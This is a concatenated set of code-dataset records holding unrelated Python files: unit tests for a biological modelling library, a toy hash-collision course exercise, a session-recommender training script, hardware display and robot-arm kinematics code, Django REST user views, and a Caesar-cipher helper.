RateLawExpression, Parameter,\n DfbaObjSpecies, DfbaObjReaction,\n DfbaObjective, DfbaObjectiveExpression,\n Observable, ObservableExpression,\n Function, FunctionExpression,\n StopCondition, StopConditionExpression,\n Evidence,\n Reference, ReferenceType, DatabaseReference,\n )\nfrom wc_lang import util\nimport shutil\nimport tempfile\nimport unittest\n\n\nclass TestUtil(unittest.TestCase):\n \"\"\" Test utilities \"\"\"\n\n def setUp(self):\n self.model = mdl = Model()\n\n self.comp_0 = comp_0 = mdl.compartments.create(id='comp_0', name='compartment 0')\n self.comp_1 = comp_1 = mdl.compartments.create(id='comp_1', name='compartment 1')\n self.compartments = compartments = [comp_0, comp_1]\n\n self.species_types = species_types = []\n self.species = species = []\n for i in range(8):\n spec_type = mdl.species_types.create(id='spec_type_{}'.format(\n i), name='species type {}'.format(i), type=SpeciesTypeType.metabolite)\n species_types.append(spec_type)\n\n if i != 3:\n spec = Species(species_type=spec_type, compartment=comp_0)\n else:\n spec = Species(species_type=spec_type, compartment=comp_1)\n spec.id = Species.gen_id(spec.species_type.id, spec.compartment.id)\n spec.model = mdl\n species.append(spec)\n\n conc = DistributionInitConcentration(id=DistributionInitConcentration.gen_id(spec.id), species=spec, mean=1)\n conc.model = mdl\n\n self.submdl_0 = submdl_0 = mdl.submodels.create(id='submdl_0', algorithm=SubmodelAlgorithm.ssa)\n self.submdl_1 = submdl_1 = mdl.submodels.create(id='submdl_1', algorithm=SubmodelAlgorithm.ssa)\n self.submdl_2 = submdl_2 = mdl.submodels.create(id='submdl_2', algorithm=SubmodelAlgorithm.dfba)\n self.submodels = [submdl_0, submdl_1, submdl_2]\n\n self.rxn_0 = rxn_0 = submdl_0.reactions.create(id='rxn_0', model=mdl)\n rxn_0.participants.create(species=species[0], coefficient=-2)\n rxn_0.participants.create(species=species[1], coefficient=-3)\n rxn_0.participants.create(species=species[2], coefficient=1)\n expression = RateLawExpression(\n expression='k_cat_0 * {0} / (k_m_0 + {0})'.format(species[5].get_primary_attribute()),\n species=species[5:6])\n expression.parameters.create(id='k_cat_0', value=2, model=mdl)\n expression.parameters.create(id='k_m_0', value=1, model=mdl)\n rate_law_0 = rxn_0.rate_laws.create(expression=expression, model=mdl)\n\n self.rxn_1 = rxn_1 = submdl_1.reactions.create(id='rxn_1', model=mdl)\n rxn_1.participants.create(species=species[0], coefficient=-2)\n rxn_1.participants.create(species=species[1], coefficient=-3)\n rxn_1.participants.create(species=species[3], coefficient=2)\n expression = RateLawExpression(\n expression='k_cat_1 * {0} / (k_m_1 + {0})'.format(species[6].get_primary_attribute()),\n species=species[6:7])\n expression.parameters.create(id='k_cat_1', value=2, model=mdl)\n expression.parameters.create(id='k_m_1', value=1, model=mdl)\n rate_law_1 = rxn_1.rate_laws.create(expression=expression, model=mdl)\n\n self.rxn_2 = rxn_2 = submdl_2.reactions.create(id='rxn_2', model=mdl)\n rxn_2.participants.create(species=species[0], coefficient=-2)\n rxn_2.participants.create(species=species[1], coefficient=-3)\n rxn_2.participants.create(species=species[4], coefficient=1)\n expression = RateLawExpression(\n expression='k_cat_2 * {0} / (k_m_2 + {0})'.format(species[7].get_primary_attribute()),\n species=species[7:8])\n expression.parameters.create(id='k_cat_2', value=2, model=mdl)\n expression.parameters.create(id='k_m_2', value=1, model=mdl)\n rate_law_2 = rxn_2.rate_laws.create(expression=expression, model=mdl)\n\n self.reactions = [rxn_0, rxn_1, rxn_2]\n self.rate_laws = [rate_law_0, rate_law_1, rate_law_2]\n\n self.parameters = parameters = []\n self.references = references = []\n self.db_refs = db_refs = []\n for i in range(3):\n param = mdl.parameters.create(id='param_{}'.format(i))\n parameters.append(param)\n\n ref = param.references.create(id='ref_{}'.format(i), type=ReferenceType.misc)\n ref.model = mdl\n references.append(ref)\n\n x_ref = ref.db_refs.create(database='Y', id='x')\n db_refs.append(x_ref)\n\n def test_get_model_size(self):\n model = self.model\n size = util.get_model_size(model)\n self.assertEqual(3, size['submodels'])\n self.assertEqual(8, size['species_types'])\n self.assertEqual(8, size['species'])\n self.assertEqual(3, size['reactions'])\n self.assertEqual(2, size['compartments'])\n self.assertEqual(9, size['parameters'])\n self.assertEqual(3, size['references'])\n\n def test_get_model_summary(self):\n model = self.model\n summary = util.get_model_summary(model)\n self.assertIsInstance(summary, str)\n\n def test_get_models(self):\n non_inline_models = set([\n Model, Taxon, Environment,\n Submodel, Compartment, SpeciesType, Species, Observable, DistributionInitConcentration,\n DfbaObjective,\n Reaction, RateLaw, DfbaObjSpecies, DfbaObjReaction, Parameter, Function,\n StopCondition, Evidence, Reference,\n ])\n inline_models = set([\n SpeciesCoefficient, RateLawExpression,\n DfbaObjectiveExpression, FunctionExpression, StopConditionExpression, ObservableExpression,\n DatabaseReference,\n ])\n self.assertEqual(set(util.get_models()), non_inline_models | inline_models)\n self.assertEqual(set(util.get_models(inline=False)), non_inline_models)\n\n def test_set_git_repo_metadata_from_path(self):\n model = Model()\n self.assertEqual(model.url, '')\n\n util.set_git_repo_metadata_from_path(model, path='.')\n self.assertIn(model.url, [\n 'https://github.com/KarrLab/wc_lang.git',\n 'ssh://git@github.com/KarrLab/wc_lang.git',\n 'git@github.com:KarrLab/wc_lang.git',\n ])\n\n def test_set_git_repo_metadata_from_path_error(self):\n tempdir = tempfile.mkdtemp()\n\n model = Model()\n self.assertEqual(model.url, '')\n\n with self.assertRaisesRegex(ValueError, 'is not a Git repository'):\n util.set_git_repo_metadata_from_path(model, path=tempdir)\n self.assertEqual(model.url, '')\n\n shutil.rmtree(tempdir)\n","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"146257343","text":"from itertools import product\n\n\ndef simple_hash(s):\n r = 7\n for c in s:\n r = (r * 31 + ord(c)) % 2 ** 16\n return r\n\n\ndef crack(s1):\n hash1 = simple_hash(s1)\n alphabet = \"qwertyuiopasdfghjklzxcvbnm\"\n\n for i in range(0, len(alphabet)):\n product_list = list(product(alphabet, repeat=i))\n\n for i in range(0, len(product_list)):\n s2 = (''.join(map(str, product_list[i])))\n hash2 = simple_hash(s2)\n\n if (hash1 == hash2) and (s1 != s2):\n return s2\n\n\nstring1 = \"foo\"\nstring2 = crack(string1)\nprint(string2)\n","sub_path":"IsraelX - Unlocking Information Security/Unlocking Information Security: Part Ⅰ/Lesson 3/Hackxercise 3.py","file_name":"Hackxercise 3.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"344572642","text":"\"\"\"\nuse time to cut sequences\ncommand \npython main_time.py --data_folder ../Data/xing/ --train_data train_item.pickle --valid_data test_item.pickle --test_data test_item.pickle --data_name xing --embedding_dim 300 --hidden_size 300 --lr 0.005\n\"\"\"\nimport argparse\nimport torch\n# import lib\nimport numpy as np\nimport os\nimport datetime\nfrom loss import *\nfrom network import *\nfrom optimizer import *\nfrom trainer import *\nfrom torch.utils import data\nimport pickle\nimport sys\nfrom dataset_time import *\n# from data_time import *\nfrom logger import *\nimport collections\n\nimport sys\nsys.path.insert(0, '../PyTorch_GBW_LM')\nsys.path.insert(0, '../PyTorch_GBW_LM/log_uniform')\n\nfrom sampledSoftmax import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--hidden_size', default=50, type=int)\nparser.add_argument('--num_layers', default=1, type=int)\nparser.add_argument('--batch_size', default=100, type=int)\nparser.add_argument('--dropout_input', default=0, type=float)\nparser.add_argument('--dropout_hidden', default=.2, type=float)\n\n# parse the optimizer arguments\nparser.add_argument('--optimizer_type', default='Adagrad', type=str)\nparser.add_argument('--final_act', default='tanh', type=str)\nparser.add_argument('--lr', default=.05, type=float)\nparser.add_argument('--weight_decay', default=0.0, type=float)\nparser.add_argument('--momentum', default=0.1, type=float)\nparser.add_argument('--eps', default=1e-6, type=float)\n\nparser.add_argument(\"-seed\", type=int, default=7,\n\t\t\t\t\t help=\"Seed for random initialization\")\nparser.add_argument(\"-sigma\", type=float, default=None,\n\t\t\t\t\t help=\"init weight -1: range [-sigma, sigma], -2: range [0, sigma]\")\nparser.add_argument(\"--embedding_dim\", type=int, default=-1,\n\t\t\t\t\t help=\"using embedding\")\n# parse the loss type\nparser.add_argument('--loss_type', default='TOP1', type=str)\n# parser.add_argument('--loss_type', default='BPR', type=str)\nparser.add_argument('--topk', default=5, type=int)\n# etc\nparser.add_argument('--bptt', default=1, type=int)\nparser.add_argument('--test_observed', default=5, type=int)\nparser.add_argument('--window_size', default=30, type=int)\nparser.add_argument('--warm_start', default=5, type=int)\n\nparser.add_argument('--n_epochs', default=20, type=int)\nparser.add_argument('--time_sort', default=False, type=bool)\nparser.add_argument('--save_dir', default='models', type=str)\nparser.add_argument('--data_folder', default='../Data/movielen/1m/', type=str)\nparser.add_argument('--data_action', default='item.pickle', type=str)\nparser.add_argument('--data_cate', default='cate.pickle', type=str)\nparser.add_argument('--data_time', default='time.pickle', type=str)\nparser.add_argument(\"--is_eval\", action='store_true')\nparser.add_argument('--load_model', default=None, type=str)\nparser.add_argument('--checkpoint_dir', type=str, default='checkpoint')\nparser.add_argument('--data_name', default=None, type=str)\nparser.add_argument('--shared_embedding', default=None, type=int)\nparser.add_argument('--patience', default=1000)\nparser.add_argument('--negative_num', default=1000, type=int)\nparser.add_argument('--valid_start_time', default=0, type=int)\nparser.add_argument('--test_start_time', default=0, type=int)\nparser.add_argument('--model_name', default=\"samplePaddingSessionRNN\", type=str)\n\n# Get the arguments\nargs = parser.parse_args()\nargs.cuda = torch.cuda.is_available()\n\nnp.random.seed(args.seed)\ntorch.manual_seed(7)\nrandom.seed(args.seed)\n\nif args.cuda:\n\tprint(\"gpu\")\n\ttorch.cuda.manual_seed(args.seed)\nelse:\n\tprint(\"cpu\")\n\ndef make_checkpoint_dir(log):\n\tprint(\"PARAMETER\" + \"-\"*10)\n\tnow = datetime.datetime.now()\n\tS = '{:02d}{:02d}{:02d}{:02d}'.format(now.month, now.day, now.hour, now.minute)\n\tcheckpoint_dir = \"../log/\"+args.model_name+\"/\"+args.checkpoint_dir\n\targs.checkpoint_dir = checkpoint_dir\n\tsave_dir = os.path.join(args.checkpoint_dir, S)\n\n\tif not os.path.exists(\"../log\"):\n\t\tos.mkdir(\"../log\")\n\t\n\tif not os.path.exists(\"../log/\"+args.model_name):\n\t\tos.mkdir(\"../log/\"+args.model_name)\n\n\tif not os.path.exists(args.checkpoint_dir):\n\t\tos.mkdir(args.checkpoint_dir)\n\n\tif not os.path.exists(save_dir):\n\t\tos.mkdir(save_dir)\n\n\targs.checkpoint_dir = save_dir\n\t\n\twith open(os.path.join(args.checkpoint_dir, 'parameter.txt'), 'w') as f:\n\t\tfor attr, value in sorted(args.__dict__.items()):\n\t\t\tmsg = \"{}={}\".format(attr.upper(), value)\n\t\t\tlog.addOutput2IO(msg)\n\t\t\tf.write(\"{}={}\\n\".format(attr.upper(), value))\n\n\tmsg = \"---------\" + \"-\"*10\n\tlog.addOutput2IO(msg)\n\ndef init_model(model):\n\tif args.sigma is not None:\n\t\tfor p in model.parameters():\n\t\t\tif args.sigma != -1 and args.sigma != -2:\n\t\t\t\tsigma = args.sigma\n\t\t\t\tp.data.uniform_(-sigma, sigma)\n\t\t\telif len(list(p.size())) > 1:\n\t\t\t\tsigma = np.sqrt(6.0 / (p.size(0) + p.size(1)))\n\t\t\t\tif args.sigma == -1:\n\t\t\t\t\tp.data.uniform_(-sigma, sigma)\n\t\t\t\telse:\n\t\t\t\t\tp.data.uniform_(0, sigma)\n\ndef count_parameters(model):\n\tparameter_num = sum(p.numel() for p in model.parameters() if p.requires_grad)\n\tprint(\"parameter_num\", parameter_num) \n\ndef main():\n\n\thidden_size = args.hidden_size\n\tnum_layers = args.num_layers\n\tbatch_size = args.batch_size\n\tdropout_input = args.dropout_input\n\tdropout_hidden = args.dropout_hidden\n\tembedding_dim = args.embedding_dim\n\tfinal_act = args.final_act\n\tloss_type = args.loss_type\n\ttopk = args.topk\n\toptimizer_type = args.optimizer_type\n\tlr = args.lr\n\tweight_decay = args.weight_decay\n\tmomentum = args.momentum\n\teps = args.eps\n\tBPTT = args.bptt\n\n\tn_epochs = args.n_epochs\n\ttime_sort = args.time_sort\n\n\twindow_size = args.window_size\n\tshared_embedding = args.shared_embedding\n\n\tlog = Logger()\n\tlog.addIOWriter(args)\n\n\tmsg = \"main_time.py \"\n\tmsg += \"shared_embedding\"+str(shared_embedding)\n\tlog.addOutput2IO(msg)\n\n\tif embedding_dim == -1:\n\t\tmsg = \"embedding dim not -1 \"+str(embedding_dim)\n\t\tlog.addOutput2IO(msg)\n\t\traise AssertionError()\n\n\tdata_name = args.data_name\n\n\tprint(\"*\"*10)\n\tprint(\"train load\")\n\n\tobserved_threshold = args.test_observed\n\n\tdata_action = args.data_folder+args.data_action\n\tdata_cate = args.data_folder+args.data_cate\n\tdata_time = args.data_folder+args.data_time\n\t\n\tvalid_start_time = args.valid_start_time\n\ttest_start_time = args.test_start_time\n\n\tst = datetime.datetime.now()\n\tdata_obj = MYDATA(data_action, data_cate, data_time, valid_start_time, test_start_time, observed_threshold, window_size)\n\tet = datetime.datetime.now()\n\tprint(\"load data duration \", et-st)\n\n\ttrain_data = data_obj.train_dataset\n\tvalid_data = data_obj.test_dataset\n\ttest_data = data_obj.test_dataset\n\n\tprint(\"+\"*10)\n\tprint(\"valid load\")\n\n\tinput_size = data_obj.items()\n\toutput_size = input_size\n\n\tmessage = \"input_size \"+str(input_size)\n\tlog.addOutput2IO(message)\n\n\tnegative_num = args.negative_num\n\n\tmessage = \"negative_num \"+str(negative_num)\n\tlog.addOutput2IO(message)\n\n\ttrain_data_loader = MYDATALOADER(train_data, batch_size)\n\tvalid_data_loader = MYDATALOADER(valid_data, batch_size)\n\ttest_data_loader = MYDATALOADER(valid_data, batch_size)\n\n\tif not args.is_eval:\n\t\tmake_checkpoint_dir(log)\n\n\tif not args.is_eval:\n\t\t\n\t\tss = SampledSoftmax(output_size, negative_num, embedding_dim, None)\n\n\t\tnetwork = GRU4REC(log, ss, input_size, hidden_size, output_size,\n\t\t\t\t\t\t\tfinal_act=final_act,\n\t\t\t\t\t\t\tnum_layers=num_layers,\n\t\t\t\t\t\t\tuse_cuda=args.cuda,\n\t\t\t\t\t\t\tdropout_input=dropout_input,\n\t\t\t\t\t\t\tdropout_hidden=dropout_hidden,\n\t\t\t\t\t\t\tembedding_dim=embedding_dim,\n\t\t\t\t\t\t\tshared_embedding=shared_embedding\n\t\t\t\t\t\t\t)\n\n\t\t# init weight\n\t\t# See Balazs Hihasi(ICLR 2016), pg.7\n\t\t\n\t\tcount_parameters(network)\n\n\t\tinit_model(network)\n\n\t\toptimizer = Optimizer(network.parameters(),\n\t\t\t\t\t\t\t\t optimizer_type=optimizer_type,\n\t\t\t\t\t\t\t\t lr=lr,\n\t\t\t\t\t\t\t\t weight_decay=weight_decay,\n\t\t\t\t\t\t\t\t momentum=momentum,\n\t\t\t\t\t\t\t\t eps=eps)\n\n\t\t\n\t\t# c_weight_map = dict(collections.Counter(train_data.m_y_action))\n\t\t# c_weights = [0 for i in range(output_size)]\n\t\t# for c_i in range(1, output_size):\n\t\t# \tc_weights[c_i] = len(train_data.m_y_action)/c_weight_map[c_i]\n\n\t\tc_weights = None\n\t\t# print(\"c weights\", c_weights)\n\t\tloss_function = LossFunction(loss_type=loss_type, use_cuda=args.cuda)\n\n\t\ttrainer = Trainer(log, network,\n\t\t\t\t\t\t\t train_data=train_data_loader,\n\t\t\t\t\t\t\t eval_data=test_data_loader,\n\t\t\t\t\t\t\t optim=optimizer,\n\t\t\t\t\t\t\t use_cuda=args.cuda,\n\t\t\t\t\t\t\t loss_func=loss_function,\n\t\t\t\t\t\t\t topk = args.topk,\n\t\t\t\t\t\t\t input_size = input_size,\n\t\t\t\t\t\t\t sample_full_flag = \"sample\",\n\t\t\t\t\t\t\t args=args)\n\n\t\ttrainer.train(0, n_epochs - 1, batch_size)\n\n\telse:\n\t\tif args.load_model is not None:\n\t\t\tprint(\"Loading pre trained model from {}\".format(args.load_model))\n\t\t\tcheckpoint = torch.load(args.load_model)\n\t\t\tmodel = checkpoint[\"model\"]\n\t\t\tmodel.gru.flatten_parameters()\n\t\t\toptim = checkpoint[\"optim\"]\n\t\t\tloss_function = LossFunction(loss_type=loss_type, use_cuda=args.cuda)\n\t\t\tevaluation = Evaluation(model, loss_function, use_cuda=args.cuda)\n\t\t\tloss, recall, mrr = evaluation.eval(valid_data)\n\t\t\tprint(\"Final result: recall = {:.2f}, mrr = {:.2f}\".format(recall, mrr))\n\t\telse:\n\t\t\tprint(\"Pre trained model is None!\")\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"main_time.py","file_name":"main_time.py","file_ext":"py","file_size_in_byte":8988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"612454725","text":"\"\"\"\nAuthor: Amit Lazar\nFileName: physical.py\nDescription: Wrappers for physical devices that need them.\n\"\"\"\nfrom Adafruit_LED_Backpack import SevenSegment\n\n\nclass Display(SevenSegment.SevenSegment):\n \"\"\"A wrapper of SevenSegment.SevenSegment class.\"\"\"\n\n def __init__(self, **kwargs):\n super(Display, self).__init__(**kwargs)\n self.begin()\n self.clear()\n self.dots = True\n self.write_display()\n\n def write_display(self):\n \"\"\"Write to the display.\n\n Write to the display. Required because \n SevenSegment.SevenSegment.write_display() caused\n IOError sometimes for no apparent reason.\"\"\"\n try:\n super(Display, self).write_display()\n except IOError:\n self.write_display()\n\n def set_time(self, time):\n \"\"\"Set the time on the display and the dots on/off as needed.\n\n :param time: the time as (hour, minute)\n :type time: (int, int) tuple\n \"\"\"\n hour, minutes = time\n self.set_digit(0, hour / 10)\n self.set_digit(1, hour % 10)\n self.set_digit(2, minutes / 10)\n self.set_digit(3, minutes % 10)\n self.set_dots(self.dots)\n self.write_display()\n\n def set_dots(self, on):\n \"\"\"Sets the dots on/off.\n\n :param on: whether they should be on (True) or off\n :type on: bool\n \"\"\"\n self.dots = on\n for pos in xrange(4):\n self.set_decimal(pos, on)\n self.write_display()\n","sub_path":"physical.py","file_name":"physical.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"232860757","text":"import pickle\nimport numpy as np\nfrom utiles_classification import *\nfrom process_activation_maps import load_maps\n\n#Files\nmapconv1J_file='../maps/PHONIM_l_conv1_35maps_th0.001000.pkl'\nmapconv1F_file='../maps/BREF80_l_conv1_35maps_th0.500000.pkl'\n\n#Load data\nconv1J = load_maps(mapconv1J_file)\nconv1F = load_maps(mapconv1F_file)\nph = ['R']\ndics = [conv1J]\ncat = conv1J.keys()\nl_cartes = [25, 56, 114, 120]\na_ignorer = []\nn_folds = 5\ntype = 'c_inc'\n\nldaClassification(dics,ph,cat,l_cartes,a_ignorer,n_folds,type)\n\n","sub_path":"reseau/classificationLDA/classificationLDAunitaire.py","file_name":"classificationLDAunitaire.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"382730646","text":"from rest_framework import serializers as rest_serializers\n\nfrom geotrek.feedback import models as feedback_models\n\n\nclass ReportSerializer(rest_serializers.ModelSerializer):\n class Meta:\n model = feedback_models.Report\n geo_field = 'geom'\n id_field = 'id'\n","sub_path":"geotrek/feedback/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"388177151","text":"from rest_framework import status\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.generics import (CreateAPIView, DestroyAPIView,\n RetrieveAPIView, UpdateAPIView)\nfrom rest_framework.permissions import AllowAny, IsAdminUser, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework_jwt.authentication import JSONWebTokenAuthentication\n\nfrom api.models import User, UserProfile\nfrom api.permissions import IsOwnerOrReadOnly\nfrom api.user.serializers import (UserFKSerializer, UserLoginSerializer,\n UserSerializer, UserUpdateSerializer)\n\nfrom .serializers import UserRegistrationSerializer\n\n\nclass AuthCheck(APIView):\n permission_classes = (IsAuthenticated,)\n\n def post(self, request):\n return Response({'message': 'pass'}, status=status.HTTP_200_OK)\n\nclass AdminCheck(APIView):\n permission_classes = (IsAdminUser,)\n\n def post(self, request):\n return Response({'message': 'pass'}, status=status.HTTP_200_OK)\n\n\nclass UserList(RetrieveAPIView):\n permission_classes = (IsAdminUser,)\n\n def get(self, request):\n users = User.objects.all()\n serializer = UserFKSerializer(users, many=True)\n return Response(serializer.data)\n\n\nclass UserListAny(RetrieveAPIView):\n permission_classes = (IsOwnerOrReadOnly,)\n\n def get(self, request, user_id):\n user = User.objects.get(id=user_id)\n serializer = UserFKSerializer(user)\n self.check_object_permissions(self.request, {'user': user.email})\n return Response(serializer.data)\n\n\nclass UserUpdate(UpdateAPIView):\n permission_classes = (IsAdminUser,)\n serializer_class = UserUpdateSerializer\n\n def put(self, request, user_id):\n user = User.objects.get(pk=user_id)\n profile = UserProfile.objects.get(user_id=user_id)\n profileSerializer = UserSerializer(\n profile, data={'first_name': request.data.get('profile').get('first_name'),\n 'last_name': request.data.get('profile').get('last_name'), 'phone_number': request.data.get('profile').get('phone_number'),\n 'age': request.data.get('profile').get('age'), 'gender': request.data.get('profile').get('gender')}, partial=True)\n profileSerializer.is_valid(raise_exception=True)\n profileSerializer.save()\n if request.data.get('password'):\n serializer = self.serializer_class(\n user, data={'email': request.data.get('email'), 'password': request.data.get('password')}, partial=True)\n else:\n serializer = self.serializer_class(\n user, data={'email': request.data.get('email')}, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({'success': 'Updated Successfully!', 'data': serializer.data}, status=status.HTTP_200_OK)\n\n\nclass UserDelete(DestroyAPIView):\n permission_classes = (IsAdminUser,)\n\n def delete(self, _, user_id):\n user = User.objects.get(pk=user_id)\n user.delete()\n return Response({'success': 'Deleted Successfully!'}, status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserRegistrationView(CreateAPIView):\n\n permission_classes = (IsAdminUser,)\n serializer_class = UserRegistrationSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n status_code = status.HTTP_201_CREATED\n response = {\n 'success': 'True',\n 'status': status_code,\n 'message': 'User registered successfully!'\n }\n\n return Response(response, status=status_code)\n\n\nclass UserLoginView(RetrieveAPIView):\n\n serializer_class = UserLoginSerializer\n permission_classes = (AllowAny,)\n\n def post(self, request):\n try:\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n response = {\n 'success': 'True',\n 'status': status.HTTP_200_OK,\n 'message': 'User logged in successfully!',\n 'token': serializer.data['token']\n }\n status_code = status.HTTP_200_OK\n except Exception as e:\n response = {\n 'success': 'False',\n 'status': status.HTTP_401_UNAUTHORIZED,\n 'message': 'Username and password do not match!',\n 'token': ''\n }\n status_code = status.HTTP_401_UNAUTHORIZED\n\n return Response(response, status=status_code)\n\n\n# User Profile View\nclass UserProfileView(RetrieveAPIView):\n\n permission_classes = (IsAuthenticated,)\n authentication_class = JSONWebTokenAuthentication\n\n def get(self, request):\n try:\n user_profile = UserProfile.objects.get(user=request.user)\n status_code = status.HTTP_200_OK\n response = {\n 'success': 'True',\n 'status': status_code,\n 'message': 'User profile fetched successfully!',\n 'data': [\n {\n 'first_name': user_profile.first_name,\n 'last_name': user_profile.last_name,\n 'phone_number': user_profile.phone_number,\n 'age': user_profile.age,\n 'gender': user_profile.gender\n }\n ]\n }\n except Exception as e:\n status_code = status.HTTP_400_BAD_REQUEST\n response = {\n 'success': 'False',\n 'status': status_code,\n 'message': 'User does not exists!',\n 'error': str(e)\n }\n return Response(response, status=status_code)\n","sub_path":"api/user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"400310711","text":"import numpy as np\nfrom sympy import *\n\nd1 = 300\nd5 = 72\na2 = 250\na3 = 160\na4 = 117\nphi = np.deg2rad(-90)\n\ndef get_max_reach(p_z, phi):\n pw_z = p_z - d1 - ((d5 + a4) * np.sin(phi))\n theta = np.arcsin(pw_z / (a2 + a3))\n phi = np.deg2rad(phi)\n print(np.rad2deg(theta))\n print(np.rad2deg(phi - theta))\n return ((a2 + a3) * np.cos(theta)) + ((d5 + a4) * np.cos(phi - theta))\n\n\ndef compute_coordinates(joint_variables):\n\n q1 = joint_variables[0]\n q2 = joint_variables[1]\n q3 = joint_variables[2]\n q4 = joint_variables[3]\n \n x = ((a2 * np.cos(q2)) + (a3 * np.cos(q2 + q3)) + ((d5 + a4) * np.cos(q2 + q3 + q4))) * np.sin(q1)\n y = ((a2 * np.cos(q2)) + (a3 * np.cos(q2 + q3)) + ((d5 + a4) * np.cos(q2 + q3 + q4))) * np.cos(q1)\n z = ((a2 * np.sin(q2)) + (a3 * np.sin(q2 + q3)) + ((d5 + a4) * np.sin(q2 + q3 + q4))) + d1\n\n print(\"x: {}\\ty: {}\\tz: {}\".format(x, y, z))\n\n\ndef inverse_kinematics(p_x, p_y, p_z, phi = -90):\n\n phi = np.deg2rad(phi)\n\n while (1):\n q1 = -np.arctan2(p_x, p_y)\n\n pw_xy = np.sqrt(p_x ** 2 + p_y ** 2) - ((d5 + a4) * np.cos(phi))\n pw_z = p_z - d1 - ((d5 + a4) * np.sin(phi))\n\n k = (pw_xy ** 2 + pw_z ** 2 + a2 ** 2 - a3 ** 2) / (2 * a2)\n r = np.sqrt(pw_xy ** 2 + pw_z ** 2)\n p = np.arctan(pw_z / pw_xy)\n q2 = np.arccos (k / r) + p\n\n c3 = (pw_xy ** 2 + pw_z ** 2 - a2 ** 2 - a3 ** 2) / (2 * a2 * a3)\n s3 = np.sqrt(1 - c3 ** 2)\n #q3 = -np.arctan2(s3, c3)\n q3 = -np.arccos(c3)\n\n q4 = phi - q2 - q3\n\n q5 = 0\n\n if (np.rad2deg(q2) < -30 or np.rad2deg(q2) > 100 or np.rad2deg(q3) > 0 or np.rad2deg(q3) < -110 or np.rad2deg(q4) > 90 or np.rad2deg(q4) < -90 or np.isnan(q2) or np.isnan(q3) or np.isnan(q4)):\n joint_variables = -1\n phi += np.deg2rad(1)\n if phi > 0:\n break\n else:\n joint_variables = [q1, q2, q3, q4, q5]\n break\n\n if (joint_variables == -1):\n print(\"Inverse Kinematics Error.\")\n exit()\n\n return joint_variables, phi\n\ndef gripper_orientation(circle, nearest_circle):\n\n prev_theta = np.deg2rad(90)\n learning_rate = 0.30\n epoch = 100\n\n theta_gd = []\n cost_gd = []\n\n r1 = 25\n x = Symbol('x')\n\n gripper_cost_fcn = (1 / ((r1 * cos(x) - (nearest_circle[0] - circle[0])) ** 2 + (r1 * sin(x) - (nearest_circle[1] - circle[1])) ** 2))\n gripper_cost_fcn_der = gripper_cost_fcn.diff(x)\n\n gripper_cost_fcn = lambdify(x, gripper_cost_fcn)\n gripper_cost_fcn_der = lambdify(x, gripper_cost_fcn_der)\n\n theta_gd.append(prev_theta)\n cost_gd.append(gripper_cost_fcn(prev_theta))\n\n for i in range(epoch):\n #theta = prev_theta - learning_rate * gripper_cost_fcn_der(prev_theta, circle[0], circle[1], nearest_circle[0], nearest_circle[1])\n theta = prev_theta - learning_rate * gripper_cost_fcn_der(prev_theta)\n theta_gd.append(theta)\n #cost_gd.append(gripper_cost_fcn(theta, circle[0], circle[1], nearest_circle[0], nearest_circle[1]))\n cost_gd.append(gripper_cost_fcn(theta))\n\n prev_theta = theta\n\n #theta = np.arctan2(nearest_circle[1] - circle[1], nearest_circle[0] - circle[0])\n theta = np.arctan((nearest_circle[1] - circle[1]) / (nearest_circle[0] - circle[0]))\n \n q5 = theta_gd[epoch - 1] + theta\n\n return q5\n","sub_path":"ee236/project3/rvm1_ik.py","file_name":"rvm1_ik.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"523303166","text":"import string\n\ndef alphabet_position(letter):\n letter = letter.lower()\n position = string.ascii_lowercase.index(letter)\n return position\n\ndef rotate_character(char, rot):\n if char not in string.ascii_letters:\n new_character = char\n elif char in string.ascii_lowercase:\n position = alphabet_position(char)\n new_index = (position + int(rot)) % 26\n new_character = string.ascii_lowercase[new_index]\n else:\n position = alphabet_position(char)\n new_index = (position + int(rot)) % 26\n new_character = string.ascii_uppercase[new_index]\n return new_character\n","sub_path":"crypto/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"381061141","text":"import sys\nimport os\nimport math\nimport itertools\nimport numpy as np\n\nARG1 = int(sys.argv[1]) # geometry, 36 options\nARG2 = int(sys.argv[2]) # tauRef, 23 options\nARG3 = int(sys.argv[3]) # freqs, infinite options\n\nimport planetengine\nplanetengine.set_global_anchor(os.path.basename(__file__)[:-3], '.')\n\nfrom planetengine.systems import Viscoplastic as System\nfrom planetengine.initials import Sinusoidal\ninitial = Sinusoidal(freq = ARG3)\nfinal = (planetengine.finals.Averages, {'tolerance': 1e-3, 'minlength': 50})\n\ninputs = dict()\ninputs['f'], inputs['aspect'] = list(itertools.product(\n np.linspace(0.5, 1.0, 6),\n [round(2. ** (i / 2), 3) for i in range(2)],\n ))[ARG1]\ninputs['tauRef'] = [float(v) for v in 10. ** 